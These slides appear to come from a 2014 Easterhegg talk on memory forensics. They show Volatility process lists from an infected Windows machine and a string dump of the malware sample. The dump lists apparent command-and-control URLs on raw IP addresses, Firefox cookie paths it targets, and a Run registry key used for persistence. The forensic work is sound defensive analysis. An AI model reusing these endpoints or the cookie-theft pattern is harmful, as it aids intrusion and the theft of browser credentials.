  • 41. xhr Easterhegg 2014 43 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324      9      433  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      936  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81870888 UPS_COLLECT_LET        1156   1548      4       34 
  • 42. xhr Easterhegg 2014 44 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324      9      433  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      936  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81870888 UPS_COLLECT_LET        1156   1548      4       34 
  • 43. xhr Easterhegg 2014 45 Offset(V)  Name                    PID   PPID   Thds     Hnds  ­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­ ­­­­­­­­  0x819cca00 System                    4      0     53      359  0x81843930 SMSS.EXE                324      4      3       19  0x8170dda0 CSRSS.EXE               608    324     10      435  0x8171c1c8 WINLOGON.EXE            632    324     17      504  0x8170ba98 SERVICES.EXE            676    632     15      258  0x81706a98 LSASS.EXE               688    632     24      369  0x8196e560 VBOXSERVICE.EXE         840    676      8      105  0x81793da0 SVCHOST.EXE             884    676     18      201  0x8170db20 SVCHOST.EXE             972    676      9      248  0x81823990 SVCHOST.EXE            1092    676     77     1492  0x81745c18 SVCHOST.EXE            1140    676      6       84  0x81703560 SVCHOST.EXE            1176    676     12      172  0x817d8730 EXPLORER.EXE           1548   1496     21      672  0x8183caf0 SPOOLSV.EXE            1664    676     10      117  0x81738da0 VBOXTRAY.EXE           1860   1548     10      939  0x81724470 CTFMON.EXE             1872   1548      4       94  0x816f0650 SVCHOST.EXE             584    676      4      105  0x817f4da0 ALG.EXE                 460    676      6      106  0x819215d0 firefox.exe            3460   1548     36      462  0x817313c0 IEXPLORE.EXE           4008   1548     16      412  0x81706228 IEXPLORE.EXE            360   4008     29      994  0x81887620 KB01065453.exe         3564   1156      1       15 
  • 44. xhr Easterhegg 2014 46 Process Dump
  • 46. xhr Easterhegg 2014 48 Putting it into IDA Pro * Having a Pro license totally rocks :) *
  • 47. xhr Easterhegg 2014 49 Detailz kthxbye! 000000011410   000000411410      0   http://113.130.65.77:8080/mx5/C/in/ 000000011458   000000411458      0   http://199.71.212.78:8080/mx5/C/in/ 0000000114A0   0000004114A0      0   http://211.191.168.98:8080/mx5/C/in/ 0000000114F0   0000004114F0      0   http://195.250.139.10:8080/mx5/C/in/ 000000011540   000000411540      0   http://173.224.208.60:8080/mx5/C/in/ 000000011590   000000411590      0   http://46.51.218.71:8080/mx5/C/in/ 0000000115D8   0000004115D8      0   http://89.97.55.33:8080/mx5/C/in/ 000000011620   000000411620      0   http://71.89.140.153:8080/mx5/C/in/ 000000011668   000000411668      0   http://195.111.72.46:8080/mx5/C/in/ 0000000116B0   0000004116B0      0   http://84.53.217.109:8080/mx5/C/in/ 0000000116F8   0000004116F8      0   http://78.46.64.17:8080/mx5/C/in/ 0000000111F8   0000004111F8      0   SoftwareMicrosoftWindows NTC%08X 000000011254   000000411254      0   MozillaFirefoxProfiles 000000011288   000000411288      0   cookies.* 00000001129C   00000041129C      0   Macromedia 0000000112BC   0000004112BC      0   firefox.exe 0000000112D4   0000004112D4      0   explorer.exe 000000011C60   000000411C60      0   SoftwareMicrosoftWindows NTS%08X 000000011CEB   000000411CEB      0   sKB%08d.exe 000000011D08   000000411D08      0   SoftwareMicrosoftWindowsCurrentVersionRun
  • 48. xhr Easterhegg 2014 50 Selected Tools
  • 49. xhr Easterhegg 2014 51 The Sleuth Kit http://www.sleuthkit.org
  • 50. xhr Easterhegg 2014 52 The Volatility Framework https://code.google.com/p/volatility/
  • 52. xhr Easterhegg 2014 54 Q & A xhr xhr giessen.ccc.de @ @_xhr_